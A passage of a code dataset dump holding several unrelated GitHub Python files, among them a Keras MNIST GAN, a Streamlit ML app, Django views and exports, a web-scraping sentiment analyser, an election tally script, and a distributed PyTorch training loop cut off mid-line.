generatedImages = generator.predict(noise)\n generatedImages = generatedImages.reshape(examples, 28, 28)\n \n plt.figure(figsize=(10, 10))\n for i in range(generatedImages.shape[0]):\n plt.subplot(dim[0], dim[1], i+1)\n plt.imshow(generatedImages[i], interpolation='nearest', cmap='gray_r')\n plt.axis('off')\n \n plt.tight_layout()\n plt.savefig('images/mnist_gan/generator_image_epoch_%d.png' % epoch)\n\nadamg = Adam(lr=0.0002, beta_1=0.5)\nadamd = Adam(lr=0.0002, beta_1=0.5)\n\n\ng = Sequential()\ng.add(Dense(256, input_dim=100, kernel_initializer=keras.initializers.RandomNormal(stddev=0.02)))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(512))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(600))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(700))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(800))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(1024))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(784))\ng.compile(loss='binary_crossentropy', optimizer=adamg, metrics=['accuracy'])\n\nd = Sequential()\nd.add(Dense(1024, input_dim=784, activation=LeakyReLU(alpha=0.2), kernel_initializer=keras.initializers.RandomNormal(stddev=0.02)))\nd.add(Dropout(0.1))\nd.add(Dense(800, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(700, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(600, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(512, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(256, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(1, activation='sigmoid'))\nd.compile(loss='binary_crossentropy', optimizer=adamd, metrics=['accuracy'])\nd.trainable = False\n\ninputs = Input(shape=(100,))\nhidden = g(inputs)\noutput = d(hidden)\ngan = Model(inputs, output)\ngan.compile(loss='binary_crossentropy', optimizer=adamg, metrics=['accuracy'])\n\nX_train, y_train, X_test, y_test = load_data()\nX_train = X_train[np.random.randint(0, X_train.shape[0], size=25)]\nprint(y_train)\n\ndef train(epochs=1, plt_frq=1, batch_size=1):\n batchCount = int(X_train.shape[0] / batch_size)\n \n losses = {\"D\":[], \"G\":[]}\n d_loss = (0, 0)\n g_loss = (0, 0)\n for epoch in range(1, epochs + 1):\n if (epoch % 50 == 0):\n print('-'*15, 'Epoch %d' % epoch, '-'*15)\n for _ in range(batchCount):\n # Create a batch by drawing random numbers from training set\n image_batch = X_train[np.random.randint(0, X_train.shape[0], size=batch_size)]\n \n # Noise for the generator\n noise = np.random.normal(0, 1, size=(batch_size, 100))\n \n # Generate images\n generated_images = g.predict(noise)\n X = np.concatenate((image_batch, generated_images))\n y = np.zeros(2 * batch_size)\n y[:batch_size] = 0.9\n y[batch_size:] = 0.1\n \n rand = np.random.randint(0, 10)\n if (rand == 0):\n y[:batch_size] = 0.1\n y[batch_size + 1:] = 0.9\n \n # Train discriminator\n d.trainable = True\n d_loss = d.train_on_batch(X, y)\n \n # Train generator\n noise = np.random.normal(0, 1, size=(batch_size, 100))\n y2 = np.ones(batch_size)\n d.trainable = False;\n g_loss = gan.train_on_batch(noise, y2)\n \n \n # Loss on final batch of epoch\n losses[\"D\"].append(d_loss[0])\n losses[\"G\"].append(g_loss[0])\n if (epoch == 1 or epoch % 50 == 0):\n plot_loss(epoch, losses[\"D\"], losses[\"G\"])\n plot_images(epoch, g)\n \n\ntrain(epochs=20000)\n \n \n \n ","repo_name":"robertvanderaarde/CavernGAN","sub_path":"MNIST_GAN.py","file_name":"MNIST_GAN.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18805272112","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport RegresionLineal as rl\nimport RegresionPolinomial as rp\nimport ClasificadorGaussiano as cg\nimport ArbolesDecision as ad\n\n#Variables Globales\ndf = \"\"\nnombreArchivo = \"\"\nextensionArchivo = \"\"\npaso1 = False\npaso2 = False\n\nst.set_page_config(\n page_title=\"Inicio\",\n page_icon=\"👋\",\n)\n\nwith st.sidebar:\n st.write(\"# Proyecto 2\")\n st.write(\"# 201602694 👋\")\n\nst.write(\"# Paso 1: Cargar un archivo de datos\")\n\ndf = st.file_uploader(\"Seleccione un archivo\", type=('csv', 'xls', 'xlsx', 'json'))\nif df:\n nombreArchivo = df.name\n extensionArchivo = nombreArchivo.split('.')[1]\n if extensionArchivo == \"json\":\n df = pd.read_json(df)\n paso1 = True\n elif extensionArchivo == \"csv\":\n df = pd.read_csv(df)\n paso1 = True\n else:\n df = pd.read_excel(df)\n paso1 = True\n\nif st.checkbox('Mostrar Datos'):\n st.write(df)\n\n\nif paso1:\n st.write(\"# Paso 2: Seleccion de algoritmo\")\n option = st.selectbox(\n 'Seleccione el algoritmo que desea ejecutar',\n ('Regresion Lineal', 'Regresion Polinomial', 'Clasificador Gaussiano', 'Clasificador de arboles de decision', 'Redes neuronales')\n )\n #st.write(option)\n paso2 = True\n\nif paso2:\n st.write(\"# Paso 3: Parametrizar \" + option)\n if option == \"Regresion Lineal\":\n rl.RegLin(df)\n elif option == \"Regresion Polinomial\":\n rp.RegPol(df)\n elif option == \"Clasificador Gaussiano\":\n cg.ClaGau(df)\n elif option == \"Clasificador de arboles de decision\":\n ad.ArbDec(df)","repo_name":"javiermiron89/OLC2_Proyecto2_VJ22","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42853732331","text":"# Write a python script to print first N terms of a Fibonacci series\n\nprint()\nnum = int(input(\"Enter a number: \"))\na=0\nb=1\nc=0\ncount = 0\n\nwhile count list:\n largest_elements = []\n smallest_elements = []\n if len(data) <= 1:\n return data\n else:\n base_element = data[len(data) // 2]\n for element in data:\n if element < base_element:\n smallest_elements.append(element)\n elif element > base_element:\n largest_elements.append(element)\n return quick_sort(smallest_elements) + [base_element] + quick_sort(largest_elements)\n\n\ndata = [random.randint(1, 100) for i in range(30)]\nprint(data)\nprint(quick_sort(data))\n\n\n","repo_name":"nikolaimaseikin/algorithms","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28299253239","text":"import xlsxwriter\nfrom datetime import date\nfrom report.models import (\n Personnel,\n Bug,\n ProjectReport,\n Nsns,\n KpiOkr,\n EmergingIssues,\n TimeOff,\n NextWeekPlan\n)\n\n\ndef export_to_xlsx(time: date, io):\n bugs = Bug.objects.filter(time=time)\n project_report = ProjectReport.objects.filter(time=time)\n nsns = Nsns.objects.filter(time=time)\n kpi_okr = KpiOkr.objects.get(time=time)\n emerging_issues = EmergingIssues.objects.get(time=time)\n timeoff = TimeOff.objects.filter(time=time)\n nextweek_plan = NextWeekPlan.objects.get(time=time)\n\n \n # Nhân sự sheet\n report = xlsxwriter.Workbook(io)\n personnel_sheet = report.add_worksheet('Nhân sự')\n bold = report.add_format({'bold': True})\n date = report.add_format({'num_format': 'yy/mm/dd'})\n personnel_sheet.write('A1', 'Thời gian', bold)\n personnel_sheet.write('B1', 'Tổng CBNV/ quota', bold)\n personnel_sheet.write('C1', 'Số nhân sự in', bold)\n personnel_sheet.write('D1', 'Số nhân sự out', bold)\n personnel_sheet.write('E1', 'Tỉ lệ nghỉ việc <20% (2NS/1NĂM)', bold)\n personnel_sheet.write('F1', 'WFO-WFH', bold)\n personnel_sheet.write('G1', 'Tình hình sức khỏe', bold)\n\n personnel_fields = Personnel.objects.values_list(\n 'time__time',\n 'personnel_of_quota',\n 'personnel_in',\n 'personnel_out',\n 'resignation_rate',\n 'wfo_wfh',\n 'health_status'\n ).get(time=time)\n col = 0\n for personnel in personnel_fields:\n if col == 0:\n personnel_sheet.write(1, col, personnel, date)\n else:\n personnel_sheet.write(1, col, personnel)\n col+=1\n\n\n report.close()","repo_name":"daitech20/periodic-report-rnd","sub_path":"apps/report/api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35927340044","text":"class university:\r\n def __init__(self):\r\n stdid=age=marks=0\r\n\r\n def validmarks(self):\r\n if(self.marks>0 and self.marks<=100):\r\n return True\r\n else:\r\n return False\r\n\r\n def valid_age(self):\r\n if(age>=20):\r\n return True\r\n else:\r\n return False\r\n\r\n def qualification(self):\r\n if(self.validmarks() and self.valid_age()) :\r\n if(self.marks> 65):\r\n return True \r\n else:\r\n return False\r\n \r\n def setter(self,sid,a,m):\r\n self.stdid=sid\r\n self.age=a\r\n self.marks=m\r\n\r\n def getter(self):\r\n if(u1.qualification()):\r\n print(\"id\",self.stdid)\r\n print(\"age\",self.age)\r\n print(\"marks:\",self.marks)\r\n print(\"given information is correct\")\r\n else:\r\n print(\"not valid\")\r\n\r\n\r\nn=int(input(\"enter the no of students\"))\r\nfor i in range(n):\r\n u1=university()\r\n stdid=int(input(\"enter the id\"))\r\n age=int(input(\"enter the age\"))\r\n marks=int(input(\"enter the marks\"))\r\n u1.setter(stdid,age,marks )\r\n u1.getter()\r\n \r\n\r\n\r\n \r\n","repo_name":"indracp29/pythonlab","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23736937987","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 19 10:04:57 2019\n\n@author: brett\n\"\"\"\n# Import statements\nimport random\nimport operator\nimport matplotlib.pyplot\n\n# Create list of agents\nagents = []\nnum_of_agents = 10\nnum_of_iterations = 100\n\n# Create agents\nfor i in range (num_of_agents):\n agents.append([random.randint(0,100),random.randint(0,100)])\n\n# Move agents\nfor j in range (num_of_iterations):\n for i in range(num_of_agents): \n if random.random() < 0.5:\n agents[i][0] = (agents[i][0] + 1) % 100\n else:\n agents[i][0] = (agents[i][0] - 1) % 100\n \n \n \n if random.random() < 0.5:\n agents[i][1] = (agents[i][1] + 1) % 100\n else:\n agents[i][1] = (agents[i][1] - 1) % 100 \n\n\n# Calculate the distance between agents\ndef distance_between(agents_row_a, agents_row_b):\n return (((agents_row_a[0] - agents_row_b[0])**2) + ((agents_row_a[1] - agents_row_b[1])**2))**0.5\n\n# Draw and print the graph\nmatplotlib.pyplot.ylim(0, 100)\nmatplotlib.pyplot.xlim(0, 100)\n\nfor i in range (num_of_agents):\n matplotlib.pyplot.scatter(agents[i][1],agents[i][0])\n \nmatplotlib.pyplot.show()\n \nfor agents_row_a in agents:\n for agents_row_b in agents:\n distance = distance_between(agents_row_a, agents_row_b)\n print(distance)","repo_name":"BrettHull/GEOG5995","sub_path":"model4.py","file_name":"model4.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38773795884","text":"from django.urls import path\n\nfrom post_app.views import PostList, CreatePost, CategoryList, GetOnePost, PostDetailUpdate, PostDetailDelete,\\\n GePublishedPosts, GeNotPublishedPosts\n\n\nurlpatterns = [\n path('create/post/', CreatePost.as_view()),\n\n path('post//', GetOnePost.as_view()),\n path('post//update/', PostDetailUpdate.as_view()),\n path('post//delete/', PostDetailDelete.as_view()),\n path('posts/', PostList.as_view()),\n path('posts/published/', GePublishedPosts.as_view()),\n path('posts/npublished/', GeNotPublishedPosts.as_view()),\n\n path('categories/', CategoryList.as_view()),\n\n]","repo_name":"Insaider-ZOG/django_app","sub_path":"post_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72994668969","text":"#!/usr/bin/env python\nimport pathlib\nimport platform\n\nfrom Cython.Build import cythonize\nfrom setuptools import Extension, find_packages, setup\n\n\ndef read_version():\n root_path = pathlib.Path(__file__).parent\n version_path = root_path / \"supriya\" / \"_version.py\"\n with version_path.open() as file_pointer:\n file_contents = file_pointer.read()\n local_dict = {}\n exec(file_contents, None, local_dict)\n return local_dict[\"__version__\"]\n\n\nextensions = [\n Extension(\n \"supriya.utils._intervals\",\n language=\"c\",\n sources=[\"supriya/utils/_intervals.pyx\"],\n )\n]\n\nif platform.system() != \"Windows\":\n extensions.append(\n Extension(\n \"supriya.contexts.shm\",\n include_dirs=[\n \"vendor\",\n \"vendor/TLSF-2.4.6/src\",\n \"vendor/supercollider/common\",\n ],\n language=\"c++\",\n libraries=[\"rt\"] if platform.system() == \"Linux\" else [],\n sources=[\"supriya/contexts/shm.pyx\"],\n )\n )\n\nif __name__ == \"__main__\":\n setup(\n ext_modules=cythonize(extensions),\n packages=find_packages(include=[\"supriya\", \"supriya.*\"])\n + [\"supriya.assets.audio\", \"supriya.assets.audio.birds\"],\n version=read_version(),\n package_data={\"supriya\": [\"py.typed\"]},\n )\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"3928711313","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport os\r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nimport re \r\n\r\n# Load the Excel file\r\ninput_file = 'input.xlsx'\r\ndf = pd.read_excel(input_file)\r\n#________________________________________________________________________________________________________________\r\n#\r\n# \r\n# \r\nprint(df)\r\nprint(df.info())\r\n\r\nprint(\"Number Of rows =\",df.shape[0])\r\nprint (\"Number of Columns =\",df.shape[1])\r\n \r\n# \r\n# ____________________________________________________________________________________________________________________\r\n\r\n# Create a directory to save the text files\r\noutput_dir = 'extracted_articles'\r\nos.makedirs(output_dir, exist_ok=True)\r\n\r\n# Function to extract and save articles\r\ndef extract_and_save_article(row):\r\n try:\r\n url_id = row['URL_ID']\r\n url = row['URL']\r\n\r\n # Send an HTTP GET request to the URL\r\n response = requests.get(url)\r\n\r\n if response.status_code == 200:\r\n # Parse the HTML content\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n # Extract the article title\r\n article_title = soup.title.string\r\n\r\n # Extract the article text (you may need to customize this based on the website's structure)\r\n article_text = \"\"\r\n\r\n # You should customize this part based on the HTML structure of the article content.\r\n # For example, if the article content is in a
with a specific class, you can use:\r\n article_content = soup.find('div', class_='article-content')\r\n if article_content:\r\n for paragraph in article_content.find_all('p'):\r\n article_text += paragraph.get_text() + '\\n'\r\n\r\n # Save the article title and text to a text file\r\n with open(os.path.join(output_dir, f'{url_id}.txt'), 'w', encoding='utf-8') as file:\r\n file.write(f'Title: {article_title}\\n\\n')\r\n file.write(article_text)\r\n print(f'Saved {url_id}.txt')\r\n\r\n else:\r\n print(f'Failed to fetch {url_id} ({url}) - Status Code: {response.status_code}')\r\n\r\n except Exception as e:\r\n print(f'Error processing {url_id}: {str(e)}')\r\n\r\n# Apply the function to each row in the DataFrame\r\ndf.apply(extract_and_save_article, axis=1)\r\n\r\nprint(\"Extraction and saving completed.\")\r\n\r\n\r\n\r\n#______________________________________________________________________________________________________________________________________________________________________\r\ntext_dir = \"extracted_articles\"\r\nstopwords_dir = \"StopWords\"\r\nsentment_dir = \"MasterDictionary\"\r\n\r\nstop_words = set()\r\nfor files in os.listdir(stopwords_dir):\r\n with open(os.path.join(stopwords_dir,files),'r',encoding='ISO-8859-1') as f:\r\n stop_words.update(set(f.read().splitlines()))\r\n\r\n\r\n# load all text files from the directory and store in a list(docs)\r\ndocs = []\r\nfor text_file in os.listdir(text_dir):\r\n with open(os.path.join(text_dir,text_file),'r') as f:\r\n text = f.read()\r\n#tokenize the given text file\r\n words = word_tokenize(text)\r\n# remove the stop words from the tokens\r\n filtered_text = [word for word in words if word.lower() not in stop_words]\r\n# add each filtered tokens of each file into a list\r\n docs.append(filtered_text)\r\n\r\n\r\npos=set()\r\nneg=set()\r\n\r\nfor files in os.listdir(sentment_dir):\r\n if files =='positive-words.txt':\r\n with open(os.path.join(sentment_dir,files),'r',encoding='ISO-8859-1') as f:\r\n pos.update(f.read().splitlines())\r\n else:\r\n with open(os.path.join(sentment_dir,files),'r',encoding='ISO-8859-1') as f:\r\n neg.update(f.read().splitlines())\r\n\r\n# now collect the positive and negative words from each file\r\n# calculate the scores from the positive and negative words \r\npositive_words = []\r\nNegative_words =[]\r\npositive_score = []\r\nnegative_score = []\r\npolarity_score = []\r\nsubjectivity_score = []\r\n\r\n\r\n#iterate through the list of docs\r\nfor i in range(len(docs)):\r\n positive_words.append([word for word in docs[i] if word.lower() in pos])\r\n Negative_words.append([word for word in docs[i] if word.lower() in neg])\r\n positive_score.append(len(positive_words[i]))\r\n negative_score.append(len(Negative_words[i]))\r\n polarity_score.append((positive_score[i] - negative_score[i]) / ((positive_score[i] + negative_score[i]) + 0.000001))\r\n subjectivity_score.append((positive_score[i] + negative_score[i]) / ((len(docs[i])) + 0.000001))\r\n\r\n# Average Sentence Length = the number of words / the number of sentences\r\n# Percentage of Complex words = the number of complex words / the number of words \r\n# Fog Index = 0.4 * (Average Sentence Length + Percentage of Complex words)\r\n\r\navg_sentence_length = []\r\nPercentage_of_Complex_words = []\r\nFog_Index = []\r\ncomplex_word_count = []\r\navg_syllable_word_count =[]\r\n\r\nstopwords = set(stopwords.words('english'))\r\ndef measure(file):\r\n with open(os.path.join(text_dir, file),'r') as f:\r\n text = f.read()\r\n# remove punctuations \r\n text = re.sub(r'[^\\w\\s.]',' ',text)\r\n# split the given text file into sentences\r\n sentences = text.split('.')\r\n# total number of sentences in a file\r\n num_sentences = len(sentences)\r\n# total words in the file\r\n words = [word for word in text.split() if word.lower() not in stopwords ]\r\n num_words = len(words)\r\n\r\n\r\n# complex words having syllable count is greater than 2\r\n# Complex words are words in the text that contain more than two syllables.\r\n complex_words = []\r\n for word in words:\r\n vowels = 'aeiou'\r\n syllable_count_word = sum( 1 for letter in word if letter.lower() in vowels)\r\n if syllable_count_word > 2:\r\n complex_words.append(word)\r\n\r\n\r\n# Syllable Count Per Word\r\n# We count the number of Syllables in each word of the text by counting the vowels present in each word.\r\n# We also handle some exceptions like words ending with \"es\",\"ed\" by not counting them as a syllable.\r\n syllable_count = 0\r\n syllable_words =[]\r\n for word in words:\r\n if word.endswith('es'):\r\n word = word[:-2]\r\n elif word.endswith('ed'):\r\n word = word[:-2]\r\n vowels = 'aeiou'\r\n syllable_count_word = sum( 1 for letter in word if letter.lower() in vowels)\r\n if syllable_count_word >= 1:\r\n syllable_words.append(word)\r\n syllable_count += syllable_count_word\r\n\r\n\r\n avg_sentence_len = num_words / num_sentences\r\n avg_syllable_word_count = syllable_count / len(syllable_words)\r\n Percent_Complex_words = len(complex_words) / num_words\r\n Fog_Index = 0.4 * (avg_sentence_len + Percent_Complex_words)\r\n\r\n return avg_sentence_len, Percent_Complex_words, Fog_Index, len(complex_words),avg_syllable_word_count\r\n \r\n\r\n\r\nfor file in os.listdir(text_dir):\r\n x,y,z,a,b = measure(file)\r\n avg_sentence_length.append(x)\r\n Percentage_of_Complex_words.append(y)\r\n Fog_Index.append(z)\r\n complex_word_count.append(a)\r\n avg_syllable_word_count.append(b)\r\n\r\n# Word Count and Average Word Length Sum of the total number of characters in each word/Total number of words\r\n# We count the total cleaned words present in the text by \r\n# removing the stop words (using stopwords class of nltk package).\r\n# removing any punctuations like ? ! , . from the word before counting.\r\n\r\ndef cleaned_words(file):\r\n with open(os.path.join(text_dir,file), 'r') as f:\r\n text = f.read()\r\n text = re.sub(r'[^\\w\\s]', '' , text)\r\n words = [word for word in text.split() if word.lower() not in stopwords]\r\n length = sum(len(word) for word in words)\r\n average_word_length = length / len(words)\r\n return len(words),average_word_length\r\n\r\nword_count = []\r\naverage_word_length = []\r\nfor file in os.listdir(text_dir):\r\n x, y = cleaned_words(file)\r\n word_count.append(x)\r\n average_word_length.append(y)\r\n\r\n\r\n# To calculate Personal Pronouns mentioned in the text, we use regex to find \r\n# the counts of the words - “I,” “we,” “my,” “ours,” and “us”. Special care is taken\r\n# so that the country name US is not included in the list.\r\ndef count_personal_pronouns(file):\r\n with open(os.path.join(text_dir,file), 'r') as f:\r\n text = f.read()\r\n personal_pronouns = [\"I\", \"we\", \"my\", \"ours\", \"us\"]\r\n count = 0\r\n for pronoun in personal_pronouns:\r\n count += len(re.findall(r\"\\b\" + pronoun + r\"\\b\", text)) # \\b is used to match word boundaries\r\n return count\r\n\r\npp_count = []\r\nfor file in os.listdir(text_dir):\r\n x = count_personal_pronouns(file)\r\n pp_count.append(x)\r\n\r\noutput_df = pd.read_excel('Output Data Structure.xlsx')\r\n\r\n# URL_ID 44 ,57, 144 does not exists i,e. page does not exist, throughs 404 error\r\n# so we are going to drop these rows from the table\r\noutput_df.drop([44-37,57-37,144-37], axis = 0, inplace=True)\r\n\r\nvariables = [positive_score,\r\n negative_score,\r\n polarity_score,\r\n subjectivity_score,\r\n avg_sentence_length,\r\n Percentage_of_Complex_words,\r\n Fog_Index,\r\n avg_sentence_length,\r\n complex_word_count,\r\n word_count,\r\n avg_syllable_word_count,\r\n pp_count,\r\n average_word_length]\r\n\r\noutput_df.to_csv('Output_Data.csv')\r\n\r\ndata=pd.read_csv(\"Output_Data.csv\")\r\nprint(data)\r\n\r\nprint(data.info)\r\nprint(\"Number Of Rows =\",data.shape[0])\r\nprint(\"Number Of Columns= \",data.shape[1])","repo_name":"rummana269/BlackCoffer","sub_path":"Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":9474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71644568807","text":"from FlaskMagazine.database import init_db\nfrom FlaskMagazine.database import db_session\nfrom FlaskMagazine.models import Product, Feature\n\ninit_db()\n\np = Product('Смартфон Xiaomi',1)\np1 = Product('Смартфон Sumsung',2)\np2 = Product('Смартфон Nokia',3)\n\ndb_session.add(p)\ndb_session.add(p1)\ndb_session.add(p2)\ndb_session.commit()\n\nfor i in range(1,4):\n f = Feature('Тип', 'Смартфон', i)\n f1 = Feature('Операционная система', 'Android', i)\n f2 = Feature('Тип корпуса', 'классический', i)\n\n db_session.add(f)\n db_session.add(f1)\n db_session.add(f2)\n db_session.commit()\n","repo_name":"franky4p/MyFlaskMagaziine","sub_path":"FlaskMagazine/Utils/create_base.py","file_name":"create_base.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21687182131","text":"from twisted.internet import reactor, defer\nfrom pollapli.core.logic.components.environments.environment_manager import EnvironmentManager\nfrom pollapli.core.logic.components.drivers.driver import DriverManager\n\nclass LogicLayer(object):\n def __init__(self,persistenceLayer=None):\n self._persistenceLayer = persistenceLayer\n self._environmentManager = EnvironmentManager(self._persistenceLayer)\n #self._driverManager = DriverManager()\n \n @defer.inlineCallbacks\n def setup(self):\n yield self._environmentManager.setup()\n \n def __getattr__(self, attr_name):\n if hasattr(self._environmentManager, attr_name):\n return getattr(self._environmentManager, attr_name) \n else:\n raise AttributeError(attr_name)\n \n @defer.inlineCallbacks\n def add_task(self,environmentId,*args,**kwargs):\n env = self._environmentManager.get_environment(environmentId, *args, **kwargs)\n task = yield env.add_task(*args,**kwargs)\n defer.returnValue(task)\n \n @defer.inlineCallbacks\n def get_tasks(self, environmentId = None, *args, **kwargs):\n env = self._environmentManager.get_environment(environmentId, *args, **kwargs)\n tasks = yield env.get_tasks(*args, **kwargs)\n defer.returnValue(tasks)\n \n @defer.inlineCallbacks \n def add_device(self,environmentId,*args,**kwargs):\n env = self._environmentManager.get_environment(environmentId)\n device = yield env.add_device(*args,**kwargs)\n defer.returnValue(device)\n \n @defer.inlineCallbacks\n def get_devices(self, environmentId = None, *args, **kwargs):\n env = self._environmentManager.get_environment(environmentId, *args, **kwargs)\n devices = yield env.get_devices(*args, **kwargs)\n defer.returnValue(devices)","repo_name":"kaosat-dev/Pollapli","sub_path":"pollapli/core/logic/logic_layer.py","file_name":"logic_layer.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23702855689","text":"import time\n\nstart = time.time()\n\n\n# Test for pentagonal numbers from Wikipedia\ndef pentagonal(n):\n if (((24 * n + 1) ** 0.5) + 1) % 6 == 0:\n return True\n return False\n\n\n# Test for hexagonal numbers from Wikipedia\ndef hexagonal(n):\n if (((8 * n + 1) ** 0.5) + 1) % 4 == 0:\n return True\n return False\n\n\nn = 286\n\nwhile True:\n triangle_number = int((n * (n + 1)) / 2)\n if not pentagonal(triangle_number):\n n += 1\n continue\n if not hexagonal(triangle_number):\n n += 1\n continue\n print(triangle_number)\n break\n\nend = time.time()\n\n# Executes in 0.0350 seconds\nprint(end - start)\n","repo_name":"Cikguseven/Project-Euler","sub_path":"Solutions/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20678493962","text":"from datetime import datetime\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom actstream.managers import ActionManager, stream\n\n\nclass MyActionManager(ActionManager):\n\n @stream\n def testfoo(self, object, time=None):\n if time is None:\n time = datetime.now()\n return object.actor_actions.filter(timestamp__lte = time)\n\n @stream\n def testbar(self, verb):\n return self.filter(verb=verb)\n","repo_name":"Save22/django-activity-stream","sub_path":"example_project/testapp/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41892250909","text":"import csv\nimport os\n\npolling_csv = os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\nelection_output = os.path.join(\".\", \"election_output.txt\")\n\n\n\ndef isNewCandidate(candidates, candidateName):\n for candidate in candidates:\n if candidateName == candidate[\"name\"]:\n return False\n\n return True\n\ndef findCandidateIndex(candidates, candidateName):\n for candidate in candidates:\n if candidateName == candidate[\"name\"]:\n return candidates.index(candidate)\n\ndef printResults(orderedCandidates):\n\tprint(\"Election Results \\n------------------\")\n\tprint(f\"Total Votes:\\t{totalVotes} \\n------------------\")\n\tfor candidate in orderedCandidates:\n\t\tcandidatePct = round(candidate['votes'] / totalVotes * 100,3)\n\t\tprint(f\"{candidate['name']}: \\t{candidatePct}% ({candidate['votes']}) \")\n\tprint(\"------------------\")\n\tprint(f\"WINNER: {orderedCandidates[0]['name']}\")\n\tprint(\"------------------\")\n\ndef printResultsToFile(orderedCandidates, election_output):\n\twith open(election_output, 'w', newline='') as txtfile:\n\t\tprint(\"Election Results \\n------------------\", file=txtfile)\n\t\tprint(f\"Total Votes:\\t{totalVotes} \\n------------------\", file=txtfile)\n\t\tfor candidate in orderedCandidates:\n\t\t\tcandidatePct = round(candidate['votes'] / totalVotes * 100,3)\n\t\t\tprint(f\"{candidate['name']}: \\t{candidatePct}% ({candidate['votes']}) \", file=txtfile)\n\t\tprint(\"------------------\", file=txtfile)\n\t\tprint(f\"WINNER: {orderedCandidates[0]['name']}\", file=txtfile)\n\t\tprint(\"------------------\", file=txtfile)\n\t\nwith open(polling_csv,newline=\"\") as csvfile:\n \n csvreader = csv.reader(csvfile, delimiter=',')\n csv_headers = next(csvreader)\n\n totalVotes = 0\n candidates = []\n for row in csvreader:\n totalVotes += 1\n\n if isNewCandidate(candidates,row[2]):\n candidates.append({\n \"name\": row[2],\n \"votes\": 0\n })\n \n idx = findCandidateIndex(candidates,row[2])\n candidates[idx][\"votes\"] += 1\n\n\n\norderedCandidates = sorted(candidates, key=lambda k: k['votes'], reverse=True)\nprintResults(orderedCandidates)\nprintResultsToFile(orderedCandidates, election_output)\n","repo_name":"brianrhackett/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683421470","text":"import config\nimport time\nimport sys\nimport datetime\nimport torch\nimport torch.fx\nfrom torch.profiler import profile, record_function, ProfilerActivity\nfrom contextlib import nullcontext\nimport numpy as np\n\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom utils import *\n\ndef run(global_rank, local_rank):\n import torch.distributed as dist\n dist.init_process_group('nccl', rank=global_rank, timeout=datetime.timedelta(hours=2))\n\n model = config.get_model(seed=39).cuda(local_rank)\n model = DDP(model, device_ids=[local_rank])\n\n # optimizer = torch.optim.SGD(model.parameters(), lr=config.lr)\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)\n train_data = config.get_data()[1]\n\n result_times = []\n last_iter_time = time.time()\n for iter in range(config.run_iter):\n optimizer.zero_grad()\n x, y = next(train_data)\n x = x.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n y = y.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n with torch.autocast(device_type=\"cuda\") if config.fp16 else nullcontext() :\n loss = model(x, y) * config.world_size # DDP seems to average the losses\n aggregated_loss = loss.detach().clone()\n dist.reduce(aggregated_loss, 